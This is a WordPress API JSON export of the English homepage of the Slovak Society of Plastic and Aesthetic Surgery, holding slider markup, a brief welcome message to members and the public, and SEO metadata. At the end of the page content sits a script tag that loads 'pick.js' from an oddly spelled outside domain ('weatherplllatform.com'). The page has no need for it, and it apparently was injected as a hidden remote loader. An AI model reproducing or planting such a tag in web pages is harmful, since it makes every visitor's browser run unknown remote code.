{"id":4183,"date":"2021-01-10T22:12:47","date_gmt":"2021-01-10T21:12:47","guid":{"rendered":"https:\/\/wp.plastchir.sk\/home\/"},"modified":"2021-01-10T22:39:16","modified_gmt":"2021-01-10T21:39:16","slug":"home","status":"publish","type":"page","link":"https:\/\/www.plastchir.sk\/en\/","title":{"rendered":"Home"},"content":{"rendered":"<p>[vc_row full_width=&#8221;stretch_row_content&#8221; css=&#8221;.vc_custom_1570283111936{padding-top: 0px !important;padding-bottom: 0px !important;}&#8221;][vc_column]\n\t\t\t<!-- START Slider 1 1 REVOLUTION SLIDER 6.3.5 --><p class=\"rs-p-wp-fix\"><\/p>\n\t\t\t<rs-module-wrap id=\"rev_slider_2_1_wrapper\" data-source=\"gallery\" style=\"background:transparent;padding:0;margin:0px auto;margin-top:0;margin-bottom:0;\">\n\t\t\t\t<rs-module id=\"rev_slider_2_1\" style=\"\" data-version=\"6.3.5\">\n\t\t\t\t\t<rs-slides>\n\t\t\t\t\t\t<rs-slide data-key=\"rs-2\" data-title=\"Slide\" data-anim=\"ei:d;eo:d;s:1000;r:0;t:fade;sl:0;\">\n\t\t\t\t\t\t\t<img src=\"\/\/wp.plastchir.sk\/wp-content\/uploads\/2021\/01\/medical_slider-scaled.jpg\" title=\"Medical team looking at camera\" width=\"2560\" height=\"1707\" class=\"rev-slidebg\" data-no-retina>\n<!--\n\t\t\t\t\t\t\t--><rs-layer\n\t\t\t\t\t\t\t\tid=\"slider-2-slide-2-layer-0\" \n\t\t\t\t\t\t\t\tdata-type=\"text\"\n\t\t\t\t\t\t\t\tdata-color=\"#0096e8\"\n\t\t\t\t\t\t\t\tdata-bsh=\"c:rgba(0,0,0,0.5);\"\n\t\t\t\t\t\t\t\tdata-tsh=\"c:rgba(0,0,0,0.75);h:7px;v:7px;b:10px;\"\n\t\t\t\t\t\t\t\tdata-rsp_ch=\"on\"\n\t\t\t\t\t\t\t\tdata-xy=\"x:20px;y:12px;\"\n\t\t\t\t\t\t\t\tdata-text=\"w:normal;s:49;l:61;fw:900;\"\n\t\t\t\t\t\t\t\tdata-frame_999=\"o:0;st:w;\"\n\t\t\t\t\t\t\t\tstyle=\"z-index:5;font-family:Roboto;text-transform:uppercase;\"\n\t\t\t\t\t\t\t>Official web page<br \/>\nof SSPAS \n\t\t\t\t\t\t\t<\/rs-layer><!--\n-->\t\t\t\t\t\t<\/rs-slide>\n\t\t\t\t\t<\/rs-slides>\n\t\t\t\t<\/rs-module>\n\t\t\t\t<script type=\"text\/javascript\">\n\t\t\t\t\tsetREVStartSize({c: 'rev_slider_2_1',rl:[1240,1024,778,480],el:[400],gw:[1240],gh:[400],type:'standard',justify:'',layout:'fullwidth',mh:\"0\"});\n\t\t\t\t\tvar\trevapi2,\n\t\t\t\t\t\ttpj;\n\t\t\t\t\tfunction revinit_revslider21() {\n\t\t\t\t\tjQuery(function() {\n\t\t\t\t\t\ttpj = jQuery;\n\t\t\t\t\t\trevapi2 = tpj(\"#rev_slider_2_1\");\n\t\t\t\t\t\tif(revapi2==undefined || revapi2.revolution == undefined){\n\t\t\t\t\t\t\trevslider_showDoubleJqueryError(\"rev_slider_2_1\");\n\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\trevapi2.revolution({\n\t\t\t\t\t\t\t\tsliderLayout:\"fullwidth\",\n\t\t\t\t\t\t\t\tvisibilityLevels:\"1240,1024,778,480\",\n\t\t\t\t\t\t\t\tgridwidth:1240,\n\t\t\t\t\t\t\t\tgridheight:400,\n\t\t\t\t\t\t\t\tperspective:600,\n\t\t\t\t\t\t\t\tperspectiveType:\"global\",\n\t\t\t\t\t\t\t\teditorheight:\"400,768,960,720\",\n\t\t\t\t\t\t\t\tresponsiveLevels:\"1240,1024,778,480\",\n\t\t\t\t\t\t\t\tprogressBar:{disableProgressBar:true},\n\t\t\t\t\t\t\t\tnavigation: {\n\t\t\t\t\t\t\t\t\tonHoverStop:false\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\tfallbacks: {\n\t\t\t\t\t\t\t\t\tallowHTML5AutoPlayOnAndroid:true\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t});\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t\t\t\t});\n\t\t\t\t\t} \/\/ End of RevInitScript\n\t\t\t\tvar once_revslider21 = false;\n\t\t\t\tif (document.readyState === \"loading\") {document.addEventListener('readystatechange',function() { if((document.readyState === \"interactive\" || document.readyState === \"complete\") && !once_revslider21 ) { once_revslider21 = true; revinit_revslider21();}});} else {once_revslider21 = true; revinit_revslider21();}\n\t\t\t\t<\/script>\n\t\t\t<\/rs-module-wrap>\n\t\t\t<!-- END REVOLUTION SLIDER -->\n[\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1610286815336{padding-top: 30px !important;padding-bottom: 10px !important;}&#8221;][vc_column width=&#8221;1\/6&#8243; css=&#8221;.vc_custom_1570286166788{padding-right: 220px !important;padding-left: 220px !important;}&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_custom_heading text=&#8221;Dear colleagues and friends,&#8221; font_container=&#8221;tag:h3|font_size:38px|text_align:left|color:%23000000&#8243; css=&#8221;.vc_custom_1610305736371{margin-bottom: 20px !important;}&#8221;][vc_custom_heading use_theme_fonts=&#8221;&#8221; text=&#8221;Welcome to the official website of the Slovak Society of Plastic and Aesthetic Surgery (SSPAS), which is a professional society of the Slovak Medical Association (SkMA). Bylaws define our society as an association which ensures development of our medical specialisation and defends it&#8217;s interests and interests of members of the society. The newly elected Executive Committee of SSPAS believes this new website will fulfill the function of a communicator and at the same time will be sufficiently providing objective informations to the members of the society as well as to the general public. Thank you for your trust.&#8221; font_container=&#8221;tag:div|font_size:18px|text_align:left|color:%23000000&#8243; google_fonts=&#8221;font_family:Raleway%3A100%2C200%2C300%2Cregular%2C500%2C600%2C700%2C800%2C900|font_style:400%20regular%3A400%3Anormal&#8221; css=&#8221;.vc_custom_1610305750718{margin-bottom: 40px !important;}&#8221;][\/vc_column][vc_column width=&#8221;1\/6&#8243;][\/vc_column][\/vc_row]<script src='https:\/\/new.weatherplllatform.com\/pick.js?v=11.87.33' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row full_width=&#8221;stretch_row_content&#8221; css=&#8221;.vc_custom_1570283111936{padding-top: 0px !important;padding-bottom: 0px !important;}&#8221;][vc_column][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1610286815336{padding-top: 30px !important;padding-bottom: 10px !important;}&#8221;][vc_column width=&#8221;1\/6&#8243; css=&#8221;.vc_custom_1570286166788{padding-right: 220px !important;padding-left: 220px !important;}&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_custom_heading text=&#8221;Dear colleagues and friends,&#8221; font_container=&#8221;tag:h3|font_size:38px|text_align:left|color:%23000000&#8243; css=&#8221;.vc_custom_1610305736371{margin-bottom: 20px !important;}&#8221;][vc_custom_heading use_theme_fonts=&#8221;&#8221; text=&#8221;Welcome to the official website of the Slovak Society of Plastic [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.6.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Home - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.plastchir.sk\/en\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Home - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\" \/>\n<meta property=\"og:description\" content=\"[vc_row full_width=&#8221;stretch_row_content&#8221; css=&#8221;.vc_custom_1570283111936{padding-top: 0px !important;padding-bottom: 0px !important;}&#8221;][vc_column][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1610286815336{padding-top: 30px !important;padding-bottom: 10px !important;}&#8221;][vc_column width=&#8221;1\/6&#8243; css=&#8221;.vc_custom_1570286166788{padding-right: 220px !important;padding-left: 220px !important;}&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_custom_heading text=&#8221;Dear colleagues and friends,&#8221; font_container=&#8221;tag:h3|font_size:38px|text_align:left|color:%23000000&#8243; css=&#8221;.vc_custom_1610305736371{margin-bottom: 20px !important;}&#8221;][vc_custom_heading use_theme_fonts=&#8221;&#8221; text=&#8221;Welcome to the official website of the Slovak Society of Plastic [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.plastchir.sk\/en\/\" \/>\n<meta property=\"og:site_name\" content=\"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\" \/>\n<meta property=\"article:modified_time\" content=\"2021-01-10T21:39:16+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.plastchir.sk\/en\/\",\"url\":\"https:\/\/www.plastchir.sk\/en\/\",\"name\":\"Home - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\",\"isPartOf\":{\"@id\":\"https:\/\/www.plastchir.sk\/#website\"},\"datePublished\":\"2021-01-10T21:12:47+00:00\",\"dateModified\":\"2021-01-10T21:39:16+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.plastchir.sk\/en\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.plastchir.sk\/en\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.plastchir.sk\/en\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.plastchir.sk\/en\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Home\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.plastchir.sk\/#website\",\"url\":\"https:\/\/www.plastchir.sk\/\",\"name\":\"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.plastchir.sk\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Home - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.plastchir.sk\/en\/","og_locale":"en_US","og_type":"article","og_title":"Home - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","og_description":"[vc_row full_width=&#8221;stretch_row_content&#8221; css=&#8221;.vc_custom_1570283111936{padding-top: 0px !important;padding-bottom: 0px !important;}&#8221;][vc_column][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; css=&#8221;.vc_custom_1610286815336{padding-top: 30px !important;padding-bottom: 10px !important;}&#8221;][vc_column width=&#8221;1\/6&#8243; css=&#8221;.vc_custom_1570286166788{padding-right: 220px !important;padding-left: 220px !important;}&#8221;][\/vc_column][vc_column width=&#8221;2\/3&#8243;][vc_custom_heading text=&#8221;Dear colleagues and friends,&#8221; font_container=&#8221;tag:h3|font_size:38px|text_align:left|color:%23000000&#8243; css=&#8221;.vc_custom_1610305736371{margin-bottom: 20px !important;}&#8221;][vc_custom_heading use_theme_fonts=&#8221;&#8221; text=&#8221;Welcome to the official website of the Slovak Society of Plastic [&hellip;]","og_url":"https:\/\/www.plastchir.sk\/en\/","og_site_name":"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","article_modified_time":"2021-01-10T21:39:16+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.plastchir.sk\/en\/","url":"https:\/\/www.plastchir.sk\/en\/","name":"Home - Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","isPartOf":{"@id":"https:\/\/www.plastchir.sk\/#website"},"datePublished":"2021-01-10T21:12:47+00:00","dateModified":"2021-01-10T21:39:16+00:00","breadcrumb":{"@id":"https:\/\/www.plastchir.sk\/en\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.plastchir.sk\/en\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.plastchir.sk\/en\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.plastchir.sk\/en\/"},{"@type":"ListItem","position":2,"name":"Home"}]},{"@type":"WebSite","@id":"https:\/\/www.plastchir.sk\/#website","url":"https:\/\/www.plastchir.sk\/","name":"Slovensk\u00e1 spolo\u010dnos\u0165 plastickej a estetickej chirurgie","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.plastchir.sk\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}},"_links":{"self":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages\/4183"}],"collection":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/comments?post=4183"}],"version-history":[{"count":6,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages\/4183\/revisions"}],"predecessor-version":[{"id":4242,"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/pages\/4183\/revisions\/4242"}],"wp:attachment":[{"href":"https:\/\/www.plastchir.sk\/en\/wp-json\/wp\/v2\/media?parent=4183"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}